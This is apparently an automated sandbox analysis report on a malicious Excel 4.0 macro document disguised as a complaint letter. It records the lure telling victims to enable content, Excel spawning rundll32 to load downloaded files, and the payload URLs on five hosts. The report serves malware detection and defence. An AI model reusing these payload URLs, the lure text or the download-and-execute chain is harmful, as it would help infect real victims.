Analysis Report Complaint_Letter_1186814227-02192021.xls

Overview

General Information

Sample Name: Complaint_Letter_1186814227-02192021.xls
Analysis ID: 356762
MD5: 888909141f8ad83f4509703b1bae7187
SHA1: dab7c94aff5dbeabebf9d85c6b2e7f6e6ba98e18
SHA256: f11a1405772bbb1aa0d1e55fc2faa77fe8a5541894e9617fbd8e6430c9e38731

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2060 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2768 cmdline: rundll32 ..\KLSD.ggsso,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2792 cmdline: rundll32 ..\KLSD.ggsso1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2748 cmdline: rundll32 ..\KLSD.ggsso2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2472 cmdline: rundll32 ..\KLSD.ggsso3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2404 cmdline: rundll32 ..\KLSD.ggsso4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Complaint_Letter_1186814227-02192021.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0xaee5:$e1: Enable Editing
  • 0x15980:$e1: Enable Editing
  • 0x159ca:$e1: Enable Editing
  • 0x200ee:$e1: Enable Editing
  • 0x20138:$e1: Enable Editing
  • 0x159e8:$e2: Enable Content
  • 0x20156:$e2: Enable Content

Source: Complaint_Letter_1186814227-02192021.xls
Rule: JoeSecurity_HiddenMacro
Description: Yara detected hidden Macro 4.0 in Excel
Author: Joe Security

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: rundll32 ..\KLSD.ggsso,DllRegisterServer, CommandLine: rundll32 ..\KLSD.ggsso,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2060, ProcessCommandLine: rundll32 ..\KLSD.ggsso,DllRegisterServer, ProcessId: 2768

    Signature Overview

    Compliance:

    Uses new MSVCR Dlls
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connections
    Source: unknown; HTTPS traffic detected: 159.89.174.35:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 13.126.100.34:443 -> 192.168.2.22:49173 version: TLS 1.2

    Software Vulnerabilities:

    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe
    Source: global traffic; DNS query: name: parama-college.id
    Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 159.89.174.35:443
    Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 203.142.76.236:80
    Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: global traffic; HTTP traffic detected:
      GET /yxpmmmg/44250678185879600000.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: parama-college.id
      Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected:
      GET /zdmqwymhhza/44250678185879600000.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: raivens.com
      Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected:
      GET /hmffuzbolyio/44250678185879600000.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: sportsmarquee.com
      Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected:
      GET /focahjqevd/44250678185879600000.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: erp.demosoftware.biz
      Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected:
      GET /gvazzbwlvyk/44250678185879600000.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: jayshreewoods.com
      Connection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknown; DNS traffic detected: queries for: parama-college.id
    Source: global traffic; HTTP traffic detected:
      HTTP/1.1 404 Not Found
      Date: Tue, 23 Feb 2021 15:16:23 GMT
      Server: Apache
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://sportsmarquee.com/wp-json/>; rel="https://api.w.org/"
      Set-Cookie: cxssh_status=off; expires=Thu, 03-Jun-2021 15:16:55 GMT; Max-Age=8640000; path=/
      Keep-Alive: timeout=5, max=1000
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49173
    Source: unknown; Network traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49173 -> 443
    Source: unknown; HTTPS traffic detected: 159.89.174.35:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 13.126.100.34:443 -> 192.168.2.22:49173 version: TLS 1.2

    System Summary:

    Found malicious Excel 4.0 Macro
    Source: Complaint_Letter_1186814227-02192021.xls; Initial sample: urlmon
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4; Screenshot OCR: Enable Editing, please click E. " ' " 14 from the yellow bar above f ynOll Xd 15 R'|ni)|| I P? I
    Source: Screenshot number: 8; Screenshot OCR: Enable Editing, please click E' " " ' ' 14 from the yellow bar above RunDLL |~| 15 16 Therewasa
    Source: Document image extraction number: 2; Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 2; Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8; Screenshot OCR: Enable Editing from the yellow bar above @ Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 8; Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
    Found Excel 4.0 Macro with suspicious formulas
    Source: Complaint_Letter_1186814227-02192021.xls; Initial sample: EXEC
    Source: Complaint_Letter_1186814227-02192021.xls; OLE indicator, VBA macros: true
    Source: Complaint_Letter_1186814227-02192021.xls, type: SAMPLE; Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
    Source: classification engine; Classification label: mal76.expl.evad.winXLS@11/13@5/5
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\72CE0000
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRBAE5.tmp
    Source: Complaint_Letter_1186814227-02192021.xls; OLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknown; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso,DllRegisterServer
    Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknown; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso1,DllRegisterServer
    Source: unknown; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso2,DllRegisterServer
    Source: unknown; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso3,DllRegisterServer
    Source: unknown; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso4,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso2,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso3,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso4,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exe; Automated click: OK
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exe; Process information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match; File source: Complaint_Letter_1186814227-02192021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
    Execution: Scripting21; Exploitation for Client Execution23; At (Linux); At (Windows); Cron
    Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
    Privilege Escalation: Process Injection1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
    Defense Evasion: Masquerading1; Disable or Modify Tools1; Rundll321; Process Injection1; Scripting21
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
    Discovery: File and Directory Discovery1; System Information Discovery2; Query Registry; System Network Configuration Discovery; Remote System Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
    Command and Control: Encrypted Channel2; Non-Application Layer Protocol3; Application Layer Protocol14; Ingress Tool Transfer4; Fallback Channels
    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
    Impact: Modify System Partition; Device Lockout; Delete Device Data

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    Source: parama-college.id; Detection: 2%; Scanner: Virustotal
    Source: erp.demosoftware.biz; Detection: 0%; Scanner: Virustotal
    Source: sportsmarquee.com; Detection: 1%; Scanner: Virustotal
    Source: raivens.com; Detection: 0%; Scanner: Virustotal

    URLs

    Source: http://jayshreewoods.com/gvazzbwlvyk/44250678185879600000.dat; Detection: 0%; Scanner: Avira URL Cloud; Label: safe
    Source: http://sportsmarquee.com/hmffuzbolyio/44250678185879600000.dat; Detection: 0%; Scanner: Avira URL Cloud; Label: safe
    Source: http://www.icra.org/vocabulary/.; Detection: 0%; Scanner: URL Reputation; Label: safe
    Source: http://windowsmedia.com/redir/services.asp?WMPFriendly=true; Detection: 0%; Scanner: URL Reputation; Label: safe
    Source: http://raivens.com/zdmqwymhhza/44250678185879600000.dat; Detection: 0%; Scanner: Avira URL Cloud; Label: safe
    Source: http://erp.demosoftware.biz/focahjqevd/44250678185879600000.dat; Detection: 0%; Scanner: Avira URL Cloud; Label: safe

    Domains and IPs

    Contacted Domains

    Name: parama-college.id; IP: 203.142.76.236; Active: true; Malicious: false; Reputation: unknown
    Name: erp.demosoftware.biz; IP: 58.96.102.67; Active: true; Malicious: false; Reputation: unknown
    Name: sportsmarquee.com; IP: 70.32.104.19; Active: true; Malicious: false; Reputation: unknown
    Name: raivens.com; IP: 159.89.174.35; Active: true; Malicious: false; Reputation: unknown
    Name: jayshreewoods.com; IP: 13.126.100.34; Active: true; Malicious: false; Reputation: unknown

      Contacted URLs

      Name: http://jayshreewoods.com/gvazzbwlvyk/44250678185879600000.dat; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
      Name: http://sportsmarquee.com/hmffuzbolyio/44250678185879600000.dat; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
      Name: http://raivens.com/zdmqwymhhza/44250678185879600000.dat; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
      Name: http://erp.demosoftware.biz/focahjqevd/44250678185879600000.dat; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown

      URLs from Memory and Binaries

      Name: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check; Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmp; Malicious: false; Reputation: high
      Name: http://www.windows.com/pctv.; Source: rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; Malicious: false; Reputation: high
      Name: http://investor.msn.com; Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; Malicious: false; Reputation: high
      Name: http://www.msnbc.com/news/ticker.txt; Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; Malicious: false; Reputation: high
      Name: http://www.icra.org/vocabulary/.; Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
      Name: http://windowsmedia.com/redir/services.asp?WMPFriendly=true; Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
      Name: http://www.hotmail.com/oe; Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; Malicious: false; Reputation: high
      Name: http://investor.msn.com/; Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmp; Malicious: false; Reputation: high

                  Contacted IPs


                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
13.126.100.34 | unknown | United States | 16509 | AMAZON-02US | false
159.89.174.35 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
58.96.102.67 | unknown | Australia | 10143 | EXETEL-AS-APExetelPtyLtdAU | false
203.142.76.236 | unknown | Indonesia | 17451 | BIZNET-AS-APBIZNETNETWORKSID | false
70.32.104.19 | unknown | United States | 398110 | GO-DADDY-COM-LLCUS | false

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:356762
                  Start date:23.02.2021
                  Start time:16:15:31
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 35s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Complaint_Letter_1186814227-02192021.xls
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:10
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal76.expl.evad.winXLS@11/13@5/5
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210
                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-02US | YFZX6dTsiT.exe | malicious | 3.22.15.135
AMAZON-02US | xKeHI0tf38.exe | malicious | 3.13.191.225
AMAZON-02US | seed.exe | malicious | 52.217.45.220
AMAZON-02US | OutplayedInstaller (1).exe | malicious | 99.86.159.128
AMAZON-02US | Facecheck - app-Installer (1).exe | malicious | 99.86.159.102
AMAZON-02US | Buff-Installer (9).exe | malicious | 13.226.162.82
AMAZON-02US | firefox-3.0.0.zip | malicious | 13.226.162.116
AMAZON-02US | MT OCEAN STAR ISO 8217 2005.xlsx | malicious | 54.67.62.204
AMAZON-02US | QTN3C2AF414EDF9_041873.xlsx | malicious | 52.57.196.177
AMAZON-02US | TIC ENQ2040 FCl.xlsx | malicious | 54.67.57.56
AMAZON-02US | MV ASIA EMERALD II.xlsx | malicious | 54.67.57.56
AMAZON-02US | TRANSIT MANIFEST CARGO FORM.xlsx | malicious | 54.67.120.65
AMAZON-02US | 8TD8GfTtaW.exe | malicious | 104.192.141.1
AMAZON-02US | R4VugGhHOo.exe | malicious | 18.197.52.125
AMAZON-02US | RFQ.exe | malicious | 52.58.78.16
AMAZON-02US | ORDER SPECIFICATIONS.exe | malicious | 13.57.130.120
AMAZON-02US | 22 FEB -PROCESSING.xlsx | malicious | 35.158.240.78
AMAZON-02US | ORDER LIST.xlsx | malicious | 54.67.62.204
AMAZON-02US | BL + PL + CI.xlsx | malicious | 54.67.120.65
AMAZON-02US | #U007einvoice#U007eSC00978656.xlsx | malicious | 54.67.57.56
EXETEL-AS-APExetelPtyLtdAU | app.exe.exe | malicious | 220.233.178.199
DIGITALOCEAN-ASNUS | Quotation Reques.exe | malicious | 138.197.103.178
DIGITALOCEAN-ASNUS | NewOrder.xlsm | malicious | 167.99.202.53
DIGITALOCEAN-ASNUS | rieuro.dll | malicious | 206.189.10.247
DIGITALOCEAN-ASNUS | document-1915351743.xls | malicious | 206.189.10.247
DIGITALOCEAN-ASNUS | DHL_Shipment_Notification#5436637389_22_FEB.exe | malicious | 165.22.240.4
DIGITALOCEAN-ASNUS | 124992436.docx | malicious | 68.183.127.92
DIGITALOCEAN-ASNUS | 124992436.docx | malicious | 68.183.127.92
DIGITALOCEAN-ASNUS | iopjvdf.dll | malicious | 206.189.10.247
DIGITALOCEAN-ASNUS | document-750895311.xls | malicious | 206.189.10.247
